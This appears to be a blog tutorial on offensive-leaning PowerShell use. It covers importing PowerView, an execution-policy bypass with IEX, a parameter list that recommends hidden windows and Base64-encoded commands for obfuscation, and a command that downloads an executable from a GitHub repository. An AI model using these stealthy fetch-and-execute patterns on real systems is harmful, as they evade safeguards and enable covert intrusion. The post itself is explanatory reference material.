PowerShell: downloading files, bypassing the execution policy, and the related command-line parameters

Module import

Import-Module Recon
Import-Module -name .\powerview.ps1

List the commands a module provides

Get-Command -Module <ModuleName>

Other

powershell.exe -ExecutionPolicy bypass -noprofile IEX('')

The command above does the following:
1. Sets the execution policy to Bypass so that a PowerShell script file can be run.
2. Does not load the user's profile (configuration file).
3. Hides the window (this needs the -WindowStyle hidden switch listed below, which the line above omits).
4. IEX is an alias of Invoke-Expression: it takes a string and runs it as a complete command, parameters included.

Name: usage
-Command: the code to execute
-ExecutionPolicy: sets the execution policy for this process; Bypass is the value generally used
-EncodedCommand: runs a Base64-encoded command; commonly used to obfuscate PowerShell command lines
-File: the name of the script file to execute
-NoExit: do not exit once the command has finished. For example, when we run powershell whoami, the PowerShell session exits as soon as the command completes; with this parameter we stay at the PowerShell prompt afterwards.
-NoLogo: do not print the PowerShell banner
-NonInteractive: do not open an interactive session
-NoProfile: do not load the current user's profile (configuration file)
-Sta: start PowerShell in single-threaded apartment mode
-Version: the PowerShell version to run the code with
-WindowStyle: the style of the PowerShell window; the possible values are Normal, Minimized, Maximized and Hidden, and Hidden is the one generally used

Abbreviated forms:
-ep bypass = -ExecutionPolicy bypass
IEX('echo hello') = Invoke-Expression('echo hello')
-WindowStyle hidden

Bypassing the PowerShell execution policy

From cmd: powershell -ep bypass
From PowerShell: Set-ExecutionPolicy Bypass -Scope Process
You can also refer to the following link on bypassing the PowerShell execution policy

Downloading remote data with PowerShell

powershell (Invoke-WebRequest -Uri "https://github.com/HoldOnToYourHeart/nc/raw/cafb11118be48803396d472ca85c3e7c099b4891/calc.exe" -OutFile "C:\Users\31030\Desktop\tools\test\calc2.exe")

Passing parameters to PowerShell functions

When we pass a PowerShell command along as a string, any single quote (') inside a parameter has to be escaped, and the way to escape it is to put another single quote in front of it. When passing parameters to a PowerShell function, prefer wrapping the value in single quotes: PowerShell then passes everything between the two single quotes as a plain string rather than as a command, which reduces the chance of errors.
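The quoting rule above in working PowerShell, as an added example that is not code from the original post; the helper name ConvertTo-SingleQuotedLiteral and the sample value are assumptions made here.

```powershell
# Added example, not code from the original post. ConvertTo-SingleQuotedLiteral is a
# helper name chosen here; the sample value is constructed.
function ConvertTo-SingleQuotedLiteral {
    param([Parameter(Mandatory)][string]$Value)
    # Inside '...' the only special character is the single quote itself,
    # which is written as two single quotes. Nothing else is expanded.
    "'" + $Value.Replace("'", "''") + "'"
}

# Constructed sample: a value that contains a single quote and a variable-looking token.
$sample = "O'Brien's `$env:COMPUTERNAME"

# Wrap the value in single quotes with the inner quote doubled.
$literal = ConvertTo-SingleQuotedLiteral $sample
Write-Output "Escaped literal: $literal"

# Evaluating the single-quoted literal returns the original text unchanged: the inner
# quote did not end the string early and $env:COMPUTERNAME was not expanded.
$fromSingle = Invoke-Expression $literal
Write-Output "Single quotes preserved the value: $($fromSingle -ceq $sample)"

# The same value wrapped in double quotes is expanded when evaluated, so the
# $env:COMPUTERNAME token is replaced by the machine name and the value changes.
# This is why a value that must travel as a string, not as code, goes in single quotes.
$fromDouble = Invoke-Expression ('"' + $sample + '"')
Write-Output "Double quotes preserved the value: $($fromDouble -ceq $sample)"
```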


Origin blog.csdn.net/qq_41874930/article/details/108146932